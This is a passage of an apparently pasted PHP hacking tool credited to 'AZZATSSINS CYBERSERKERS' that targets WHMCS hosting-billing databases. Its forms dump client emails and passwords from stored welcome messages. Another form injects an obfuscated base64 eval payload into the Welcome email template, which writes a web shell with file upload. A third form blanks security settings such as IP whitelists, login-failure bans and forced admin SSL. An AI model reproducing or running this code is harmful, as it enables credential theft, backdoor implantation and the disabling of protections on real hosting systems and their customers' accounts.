  1632. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
  1633.  
  1634. </table>
  1635. <br></form></center>
  1636.  
  1637. <?php
  1638. if(isset($_POST['plapon'])) {
  1639.  
  1640. $perawan = $_POST['anu1'];
  1641. $kimcil = $_POST['anu2'];
  1642. $janda = $_POST['anu3'];
  1643. $hotel = $_POST['anu4'];
  1644. function get_string_between($string, $start, $end){
  1645. $string = " ".$string;
  1646. $ini = strpos($string,$start);
  1647. if ($ini == 0) return "";
  1648. $ini += strlen($start);
  1649. $len = strpos($string,$end,$ini) - $ini;
  1650. return substr($string,$ini,$len);
  1651. }
  1652. @mysql_connect($perawan,$kimcil,$janda);
  1653. @mysql_select_db($hotel) or die ("Gagal Koneksi Ke Database");
  1654. $query="select subject,message from tblemails";
  1655. $result=mysql_query($query);
  1656. mysql_close();
  1657. $num=mysql_numrows($result);
  1658. $i=0;
  1659. while ($i < $num) {
  1660. $css =mysql_result($result,$i,"subject");echo "<br/><br/><center><table class='explore' style=width:830px;padding:0 1px;>
  1661. <tr><th colspan='7'> <span class='b7'>O=:[ HOST ROOT ]:=O</span> </th></tr><tr>
  1662. <th align='center'><b>CLIENT EMAIL</b></th>
  1663. <th align='center'><b>CLIENT PASSWORD</b></th>
  1664. </tr>";
  1665.  
  1666.  
  1667. if(stristr($css,"Welcome")){
  1668. $s =mysql_result($result,$i,"message");
  1669. if(stristr($s,"Login Username: ") or stristr($s,"Email Address: ")){
  1670. $mail= get_string_between($s,"Login Username: ","<br />");
  1671. $m2 = get_string_between($s,"Email Address: ","<br />");
  1672. $pass = get_string_between($s,"Password: ","</p>");
  1673. print $mail.$m2.":".$pass."<br>";
  1674.  
  1675. echo "<tr>
  1676. <td align='center'>$mail.$m2.</td>
  1677. <td align='center'>".$pass."</td>
  1678. </tr>";
  1679. }
  1680. }
  1681. ++$i;
  1682. }
  1683. }  
  1684. echo "</table>";
  1685. }
  1686.  
  1687. if($_GET['whmcs']=="shell"){
  1688. set_time_limit(0);
  1689. ?>
  1690.  <p><br/><body>
  1691. <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ INJECT </span> <span class="b8">SHELL ]:=O</span></b></nobr><br/><br/>
  1692. <p><form method="post">
  1693. <table border=1>
  1694. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu1" value="localhost"></td></tr>
  1695. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu2"></td></tr>
  1696. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu3"></td></tr>
  1697. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="80" name="anu4"></td></tr>
  1698. <tr><td align="center" colspan="2"> <textarea style='color:red;background-color:#000000' rows='10' cols='67'
  1699. name=shell>{php}eval(base64_decode('JGMwZGUgID0gYmFzZTY0X2RlY29kZSgnUjBsR09EbGhVRHM4Y0NCaGJHbG5iajBpWTJWdWRHVnlJajROQ2cwS1BEOXdhSEFOQ21WeWNtOXlYM0psY0c5eWRHbHVaeWd3S1RzTkNpUnpZM0pwY0hSdVlXMWxJRDBnSkY5VFJWSldSVkpiSjFORFVrbFFWRjlPUVUxRkoxMDdEUW9rWm1sc1pXNWhiV1VnUFNBa1gxQlBVMVJiSW1acGJHVnVZVzFsSWwwN0RRcHBaaWdrWDFCUFUxUmJJbk4xWW0xcGRDSmRJRDA5SUNKUGNHVnVJaWtOQ25zTkNtbG1LR1pwYkdWZlpYaHBjM1J6S0NSbWFXeGxibUZ0WlNrcERRcDdEUW9rWm1sc1pXTnZiblJsYm5SeklEMGdhSFJ0YkdWdWRHbDBhV1Z6S0dacGJHVmZaMlYwWDJOdmJuUmxiblJ6S0NSbWFXeGxibUZ0WlNrcE93MEthV1lvSVNSbWFXeGxZMjl1ZEdWdWRITXBEUW9rYzNSaGRIVnpJRDBnSWp4bWIyNTBJR1poWTJVOUoxWmxjbVJoYm1FbklITjBlV3hsUFNkbWIyNTBMWE5wZW1VNklEaHdkQ2MrUlhKeWIzSWdUbTkwYUdsdVp5QkdhV3hsUEM5bWIyNTBQaUk3RFFwOURRcGxiSE5sRFFva2MzUmhkSFZ6SUQwZ0lqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1JtbHNaU0JrYjJWeklHNXZkQ0JsZUdsemRDRThMMlp2Ym5RK0lqc05DbjBKQ1EwS1pXeHpaU0JwWmlna1gxQlBVMVJiSW5OMVltMXBkQ0pkSUQwOUlDSkVaV3hsZEdVaUtRMEtldzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR1pwYkdWdVlXMWxLU2tOQ25zTkNtbG1LSFZ1YkdsdWF5Z2tabWxzWlc1aGJXVXBLUWtOQ2lSemRHRjBkWE1nUFNBaVBHWnZiblFnWm1GalpUMG5WbVZ5WkdGdVlTY2djM1I1YkdVOUoyWnZiblF0YzJsNlpUb2dPSEIwSno1R2FXeGxJSE4xWTJObGMzTm1kV3hzZVNCa1pXeGxkR1ZrSVR3dlptOXVkRDRpT3cwS1pXeHpaUTBLSkhOMFlYUjFjeUE5SUNJOFptOXVkQ0JtWVdObFBTZFdaWEprWVc1aEp5QnpkSGxzWlQwblptOXVkQzF6YVhwbE9pQTRjSFFuUGtOdmRXeGtJRzV2ZENCa1pXeGxkR1VnWm1sc1pTRThMMlp2Ym5RK0lqc05DbjBOQ21Wc2MyVU5DaVJ6ZEdGMGRYTWdQU0FpUEdadmJuUWdabUZqWlQwblZtVnlaR0Z1WVNjZ2MzUjViR1U5SjJadmJuUXRjMmw2WlRvZ09IQjBKejVHYVd4bElHUnZaWE1nYm05MElHVjRhWE4wSVR3dlptOXVkRDRpT3cwS2ZRMEtaV3h6WlNCcFppZ2tYMUJQVTFSYkluTjFZbTFwZENKZElEMDlJQ0pUWVhabElpa05DbnNOQ2lSbWFXeGxZMjl1ZEdWdWRITWdQU0J6ZEhKcGNITnNZWE5vWlhNb2FIUnRiRjlsYm5ScGRIbGZaR1ZqYjJSbEtDUmZVRTlUVkZzaVkyOXVkR1Z1ZEhNaVhTa3BPdzBLYVdZb1ptbHNaVjlsZUdsemRITW9KR1pwYkdWdVlXMWxLU2tOQ25WdWJHbHVheWdrWm1sc1pXNWhiV1VwT3cwS0pHaGhibVJzWlNBOUlHWnZjR1Z1S0NSbWFXeGxibUZ0WlN3Z0luY2lLVHNOQ21sbUtDRWthR0Z1Wkd4bEtRMEtKSE4wWVhSMWN5QTlJQ0k4Wm05dWRDQm1ZV05sUFNkV1pYSmtZVzVoSnlCemRIbHNaVDBuWm05dWRDMXphWHBsT2lBNGNIUW5Qa052ZFd4a0lHNXZkQ0J2Y0dWdUlHWnBiR1VnWm05eUlIZHlhWFJsSUdGalkyVnpjeUVnUEM5bWIyNTBQaUk3RFFwbGJITmxEUXA3RFFwcFppZ2habmR5YVhSbEtDUm9ZVzVrYkdVc0lDUm1hV3hsWTI5dWRHVnVkSE1wS1EwS0pITjBZWFIxY3lBOUlDUnpkR0YwZFhNdUlqeG1iMjUwSUdaaFkyVTlKMVpsY21SaGJtRW5JSE4wZVd4bFBTZG1iMjUwTFhOcGVtVTZJRGh3ZENjK1EyOTFiR1FnYm05MElIZHlhWFJsSUhSdklHWnBiR1VoSUNoTllYbGlaU0I1YjNVZ1pHbGtiaWQwSUdWdWRHVnlJR0Z1ZVNCMFpYaDBQeWs4TDJadmJuUStJanNOQ21aamJHOXpaU2drYUdGdVpHeGxLVHNOQ24wTkNpUm1hV3hsWTI5dWRHVnVkSE1nUFNCb2RHMXNaVzUwYVhScFpYTW9KR1pwYkdWamIyNTBaVzUwY3lrN0RRcDlEUXBsYkhObERRcDdEUW9rYzNSaGRIVnpJRDBnSWp4bWIyNTBJR1poWTJVOUoxWmxjbVJoYm1FbklITjBlV3hsUFNkbWIyNTBMWE5wZW1VNklEaHdkQ2MrVG04Z1ptbHNaU0JzYjJGa1pXUWhQQzltYjI1MFBpSTdEUXA5RFFvL1BnMEtQSFJoWW14bElHSnZjbVJsY2owaU1DSWdZV3hwWjI0OUltTmxiblJsY2lJK1BIUnlQangwWkQ0OGRHRmliR1VnZDJsa2RHZzlJakV3TUNVaUlHSnZjbVJsY2owaU1DSStQSFJ5UGp4MFpENE5DanhtYjNKdElHMWxkR2h2WkQwaWNHOXpkQ0lnWVdOMGFXOXVQU0k4UDBWamFHOGdKSE5qY21sd2RHNWhiV1U3UHo0aVBnMEtQR2x1Y0hWMElITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2JtRnRaVDBpWm1sc1pXNWhiV1VpSUhSNWNHVTlJblJsZUhRaUlIWmhiSFZsUFNJOFAwVmphRzhnSkdacGJHVnVZVzFsT3o4K0lpQnphWHBsUFNJM01pSStEUW84YVc1d2RYUWdkSGx3WlQwaWMzVmliV2wwSWlCemRIbHNaVDBpWTI5c2IzSTZiR2x0WlR0aVlXTnJaM0p2ZFc1a0xXTnZiRzl5T2lNd01EQXdNREFpSUc1aGJXVTlJbk4xWW0xcGRDSWdkbUZzZFdVOUlrOXdaVzRpUGcwS1BHbHVjSFYwSUhSNWNHVTlJbk4xWW0xcGRDSWdjM1I1YkdVOUltTnZiRzl5T214cGJXVTdZbUZqYTJkeWIzVnVaQzFqYjJ4dmNqb2pNREF3TURBd0lpQnVZVzFsUFNKemRXSnRhWFFpSUhaaGJIVmxQU0pFWld4bGRHVWlQand2ZEdRK1BDOTBjajQ4TDNSaFlteGxQZzBLUEdadmJuUWdabUZqWlQwaVZtVnlaR0Z1WVNJZ2MzUjViR1U5SW1admJuUXRjMmw2WlRvZ01URndkQ0krRFFvOGRHVjRkR0Z5WldFZ2JtRnRaVDBpWTI5dWRHVnVkSE1pSUhOMGVXeGxQU0pqYjJ4dmNqcHNhVzFsTzJKaFkydG5jbTkxYm1RdFkyOXNiM0k2SXpBd01EQXdNQ0lnWTI5c2N6MGlOekFpSUhKdmQzTTlJakkxSWo0TkNqdy9SV05vYnlBa1ptbHNaV052Ym5SbGJuUnpPejgrUEM5MFpYaDBZWEpsWVQ0OEwyWnZiblErUEdKeVBnMEtQR2x1Y0hWMElIUjVjR1U5SW5OMVltMXBkQ0lnYzNSNWJHVTlJbU52Ykc5eU9teHBiV1U3WW1GamEyZHliM1Z1WkMxamIyeHZjam9qTURBd01EQXdJaUJ1WVcxbFBTSnpkV0p0YVhRaUlIWmhiSFZsUFNKVFlYWmxJajROQ2p4cGJuQjFkQ0IwZVhCbFBTSnlaWE5sZENJZ2MzUjViR1U5SW1OdmJHOXlPbXhwYldVN1ltRmphMmR5YjNWdVpDMWpiMnh2Y2pvak1EQXdNREF3SWlCMllXeDFaVDBpVW1WelpYUWlQZzBLUEM5bWIzSnRQZzBLUEhBK0RRbzhhRE0rWDFWUVRFOUJSQ0JHU1V4Rlh6eG9NejROQ2cwS1BEOXdhSEFOQ2cwS1pXTm9ieUFuUEdadmNtMGdZV04wYVc5dVBTSWlJRzFsZEdodlpEMGljRzl6ZENJZ1pXNWpkSGx3WlQwaWJYVnNkR2x3WVhKMEwyWnZjbTB0WkdGMFlTSWdibUZ0WlQwaWRYQnNiMkZrWlhJaUlHbGtQU0oxY0d4dllXUmxjaUkrSnpzTkNnMEtaV05vYnlBblVFRlVTQ0JVUVZKSFJWUWdPaUE4YVc1d2RYUWdibUZ0WlQwaWRYQnNiMkZrZEc4aUlITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2RIbHdaVDBpZEdWNGRDSWdjMmw2WlQwaU5UQWlJSFpoYkhWbFBTSW5MbWRsZEdOM1pDZ3BMaWNpUGp4aWNpQXZQaWM3RFFwbFkyaHZJQ2M4YVc1d2RYUWdkSGx3WlQwaVptbHNaU0lnYzNSNWJHVTlJbU52Ykc5eU9teHBiV1U3WW1GamEyZHliM1Z1WkMxamIyeHZjam9qTURBd01EQXdJaUJ1WVcxbFBTSm1hV3hsSWlCemFYcGxQU0l6TUNJK1BHbHVjSFYwSUc1aGJXVTlJbDkxY0d3aUlITjBlV3hsUFNKamIyeHZjanBzYVcxbE8ySmhZMnRuY205MWJtUXRZMjlzYjNJNkl6QXdNREF3TUNJZ2RIbHdaVDBpYzNWaWJXbDBJaUJwWkQwaVgzVndiQ0lnZG1Gc2RXVTlJbFZ3Ykc5aFpDSStQQzltYjNKdFBpYzdEUXBwWmlnZ0pGOVFUMU5VV3lkZmRYQnNKMTBnUFQwZ0lsVndiRzloWkNJZ0tTQjdEUXBwWmloQVkyOXdlU2drWDBaSlRFVlRXeWRtYVd4bEoxMWJKM1J0Y0Y5dVlXMWxKMTBzSUNSZlVFOVRWRnNuZFhCc2IyRmtkRzhuWFM0bkx5Y3VKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwcEtTQjdEUW9OQ21WamFHOGdKenhtYjI1MElHTnZiRzl5UFNKc2FXMWxJajViSzEwZ1ZYQnNiMkZrSUZOMWEzTmxjeUE2ZGlBOFluSXZQaUJiSzEwZ0p5NGtYMUJQVTFSYkozVndiRzloWkhSdkoxMHVJaThpTGlSZlJrbE1SVk5iSjJacGJHVW5YVnNuYm1GdFpTZGRPdzBLZlNCbGJITmxJSHNOQ21WamFHOGdKMXQrWFNCVmNHeHZZV1FnUm1GcGJHVmtJRlJmVkNCYmZsMDhMMlp2Ym5RK1BHSnlQaWM3RFFwOUlIME5DajgrRFFvPScpOw0KDQokZm9wZW4gPSBmb3BlbiAoJ2RtLnBocCcsJ3cnKTsNCiR3cml0ZSAgPSBmd3JpdGUoJGZvcGVuICwgJGMwZGUpOw=='));{/php}</textarea>
  1700. </td></tr>
  1701. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
  1702. </table>
  1703. <br>
  1704. </form>
  1705. </center>
  1706. <?php
  1707. if(isset($_POST['plapon'])) {
  1708. $anu1 = $_POST['anu1'];
  1709. $anu2 = $_POST['anu2'];
  1710. $anu3 = $_POST['anu3'];
  1711. $anu4 = $_POST['anu4'];
  1712. @mysql_connect($anu1,$anu2,$anu3);
  1713. @mysql_select_db($anu4);
  1714. $shell=str_replace("'","'",$shell);
  1715. $gosok_shell = $_POST['shell'];
  1716. $colok = "UPDATE tblemailtemplates SET message ='".$gosok_shell."' WHERE subject ='Welcome'";
  1717. $udah_ganteng=@mysql_query($colok);if($udah_ganteng)
  1718. {
  1719. echo "<font color='lime'>SUKSES BOS  GANTENG :P</font>";
  1720. }
  1721. }
  1722. }
  1723.  
  1724.  
  1725.  
  1726. if($_GET['whmcs']=="token"){
  1727. set_time_limit(0);
  1728. ?>
  1729. <p><br/><body>
  1730. <center><img src="http://www.nextgenhost.net/icons/logo-cpanel-whm.png"> <br/><br/><nobr><b><span class="b7">O=:[ BYPASS </span> <span class="b8">TOKEN ]:=O</span></b></nobr><br/><br/>
  1731. <p><form method="post">
  1732. <table border=1>
  1733. <tr><td>db_host </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu1" value="localhost"></td></tr>
  1734. <tr><td>db_username </td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu2"></td></tr>
  1735. <tr><td>db_password</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu3"></td></tr>
  1736. <tr><td>db_name</td><td><input type="text" style="color:#FF0000;background-color:#000000" size="60" name="anu4"></td></tr>
  1737. <tr><td align="center" colspan="2"><input class=submit type="submit" style="color:#FF0000;background-color:#000000" value=" HAJAR BOS " name="plapon"></td></tr>
  1738. </table>
  1739. <br>
  1740. </FORM>
  1741. </center>
  1742. <?php
  1743. if(isset($_POST['plapon'])) {
  1744.  
  1745. $anu1 = $_POST['anu1'];
  1746. $anu2 = $_POST['anu2'];
  1747. $anu3 = $_POST['anu3'];
  1748. $anu4 = $_POST['anu4'];
  1749. @mysql_connect($anu1,$anu2,$anu3);
  1750. @mysql_select_db($anu4);
  1751.  
  1752. $crot1 = "UPDATE tblconfiguration SET value='' WHERE setting='InvalidLoginBanLength'";
  1753. $crot2 = "UPDATE tblconfiguration SET value='' WHERE setting='AdminForceSSL'";
  1754. $crot3 = "UPDATE tblconfiguration SET value='' WHERE setting='RequiredPWStrength'";
  1755. $crot4 = "UPDATE tblconfiguration SET value='' WHERE setting='MaintenanceMode'";
  1756. $crot5 = "UPDATE tblconfiguration SET value='' WHERE setting='APIAllowedIPs'";
  1757. $crot6 = "UPDATE tblconfiguration SET value='' WHERE setting='LoginFailures'";
  1758. $crot7 = "UPDATE tblconfiguration SET value='' WHERE setting='InstanceID'";
  1759. $crot8 = "UPDATE tblconfiguration SET value='' WHERE setting='WhitelistedIPs'";
  1760. $crot9 = "UPDATE tblconfiguration SET value='' WHERE setting='ToggleInfoPopup'";$crot10 = "UPDATE tblconfiguration SET value='' WHERE setting='token_namespaces'";
  1761.  
  1762. $udah_ganteng=@mysql_query($crot1);
  1763. $udah_ganteng=@mysql_query($crot2);
  1764. $udah_ganteng=@mysql_query($crot3);
  1765. $udah_ganteng=@mysql_query($crot4);
  1766. $udah_ganteng=@mysql_query($crot5);
  1767. $udah_ganteng=@mysql_query($crot6);
  1768. $udah_ganteng=@mysql_query($crot7);
  1769. $udah_ganteng=@mysql_query($crot8);
  1770. $udah_ganteng=@mysql_query($crot9);
  1771. $udah_ganteng=@mysql_query($crot10);
  1772.  
  1773. if($udah_ganteng)
  1774. {
  1775. echo "<font color='lime'>SUKSES BOS  GANTENG :P</font>";
  1776. }
  1777. }
  1778. }
  1779.  
  1780.  
  1781. echo'<br><div style="background:blue;margin:0px;padding:0px;text-align:center;color:black;">
  1782. <font color=silver>&copy; </font><b><i>AZZATSSINS CYBERSERKERS</i></b>
  1783. </div>';
  1784.  ?>
Add Comment
Please, Sign In to add comment